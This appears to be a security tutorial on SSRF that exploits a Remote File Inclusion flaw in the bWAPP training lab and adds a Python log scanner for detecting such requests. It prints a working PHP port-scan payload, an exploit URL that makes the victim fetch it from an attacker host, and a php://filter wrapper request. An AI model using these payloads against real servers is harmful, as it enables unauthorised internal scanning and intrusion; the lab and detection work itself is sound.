Server Side Request Forgery (SSRF) – All things in moderation

Server Side Request Forgery (SSRF)

Introduction

Server Side Request Forgery (SSRF) is a vulnerability that allows an attacker to force a vulnerable server to send malicious requests to internal resources or to third-party servers. If the server sits behind a firewall, the hosts around it are normally inaccessible from the outside world and cannot be port-scanned directly; with SSRF it is possible to bypass the firewall's access controls and port-scan the devices behind it.

SSRF basic
The idea is to find interfaces on the victim server that make the victim server send packets to its own localhost interface, or to another server that a firewall shields from the outside. Ideally this interface lets us send any packet to any host and any port, and it can be reached remotely without authentication, or at least with minimal rights. It works as follows:

– We send Packet A to Service A

– Service A sends Packet B to Service B

– The services can be on the same host or on different hosts

– We can manipulate some fields of Packet B through Packet A

– Different SSRF attacks depend on how many fields of Packet B we can control

Using Server Side Request Forgery it is possible to:

– Scan and attack systems from the internal network that are not normally accessible.

– Enumerate and attack services that are running on these hosts.

– Exploit host-based authentication services.

Some common vulnerabilities related to server-side request forgery:

– URL redirection

– Remote file inclusion

– SQL injection

– Frame injection

– Link injection

– XML external entity

Exploiting RFI to port-scan hosts on the internal network

To demonstrate this attack I will be using the SSRF module of the bWAPP framework, as shown below:

1. Check for a Remote File Inclusion (RFI) vulnerability

Select the Remote & Local File Inclusion (RFI/LFI) page, rlfi.php, then click the Go button.

After submitting the request, we notice a language=lang_en.php parameter in the GET URL. This looks like a perfect place to try RFI.

Now we check for Remote File Inclusion (RFI) by replacing language=lang_en.php with language=http://www.google.com. If the remote page's content shows up inside the bWAPP response, the parameter is passed to the include without filtering.

2. Exploit Server Side Request Forgery (SSRF)

The following is the remote file that, once pulled in through the RFI, turns the include into a port scan carried out by the vulnerable server:

<?php
// Port-scan payload served from a host the attacker controls and pulled in
// through the RFI; the vulnerable server, not the client, opens the sockets.
if (isset($_GET["ip"])) {
    $ports = array(21, 22, 23, 25, 53, 80, 443, 3306);
    foreach ($ports as $port) {
        // Conventional service name for the port (ftp, ssh, ...), or false if unknown
        $service = getservbyport($port, "tcp");
        // One-second connect timeout; @ silences the warning on refused ports
        if ($pf = @fsockopen($_GET["ip"], $port, $errno, $errstr, 1)) {
            echo "Port $port($service)" . ": <span style='color:green'>Open</span><br>";
            fclose($pf);
        } else {
            echo "Port $port($service)" . ": <span style='color:red'>Inaccessible</span><br>";
        }
    }
}
?>

Let's port-scan the internal network through the RFI:

http://192.168.28.129/bWAPP/rlfi.php?language=http://192.168.28.1:8888/ssrf_port_scan.txt&ip=192.168.28.129&action=go

192.168.28.129 is the victim's (bWAPP) address; the payload ssrf_port_scan.txt is fetched from 192.168.28.1:8888, and the ip parameter is passed straight through to it.
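Every request in this walkthrough shares one detectable trait: a file-name parameter that carries a URL scheme or a PHP stream wrapper. The script below, an added Python example that is not part of the original post or of bWAPP, scans web-server access-log lines for that pattern and flags whether the fetched target is an internal address; the log lines are constructed, and the parameter names besides language are assumed.

```python
import ipaddress
import re
from urllib.parse import parse_qsl, urlsplit

# URL schemes and stream wrappers that turn an include() of a user-supplied
# file name into a remote fetch or a wrapper read (constructed list).
RISKY_SCHEMES = {"http", "https", "ftp", "ftps", "php", "data", "file", "gopher", "dict"}
# Query parameters an application might feed into include(); "language" is
# the one rlfi.php uses, the other names are assumed.
FILE_PARAMS = {"language", "page", "file", "template"}

# Constructed sample access-log lines (combined format, trimmed); the third
# one is the request from the walkthrough above.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /bWAPP/rlfi.php?language=lang_en.php&action=go HTTP/1.1" 200 512
10.0.0.7 - - [10/Oct/2023:13:55:40 +0000] "GET /bWAPP/rlfi.php?language=http://www.google.com&action=go HTTP/1.1" 200 9001
10.0.0.7 - - [10/Oct/2023:13:56:02 +0000] "GET /bWAPP/rlfi.php?language=http://192.168.28.1:8888/ssrf_port_scan.txt&ip=192.168.28.129&action=go HTTP/1.1" 200 734
10.0.0.9 - - [10/Oct/2023:13:57:10 +0000] "GET /bWAPP/rlfi.php?language=php://filter/convert.base64-encode/resource=rlfi.php HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*"')

def is_internal(host):
    """True for loopback, private or link-local targets, i.e. hosts behind the firewall."""
    if host.lower() == "localhost":
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return ip.is_private or ip.is_loopback or ip.is_link_local

def classify_request(path):
    """Return findings for one request path; an empty list when nothing is suspicious."""
    findings = []
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        scheme = value.split(":", 1)[0].lower() if ":" in value else ""
        if name in FILE_PARAMS and scheme in RISKY_SCHEMES:
            target = urlsplit(value).hostname or value
            findings.append({"param": name, "scheme": scheme, "target": target,
                             "internal_target": is_internal(target)})
    return findings

def scan_log(text):
    """Run classify_request over every parsable log line and tag hits with source and time."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for f in classify_request(m.group("path")):
            alerts.append({"src": m.group("src"), "ts": m.group("ts"), **f})
    return alerts

if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"{a['ts']} {a['src']} {a['param']} via {a['scheme']} -> {a['target']}"
              f" internal={a['internal_target']}")
```

An alert with internal_target set is the SSRF case worth prioritising: the server fetched from a host only it can reach.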

Sample output:

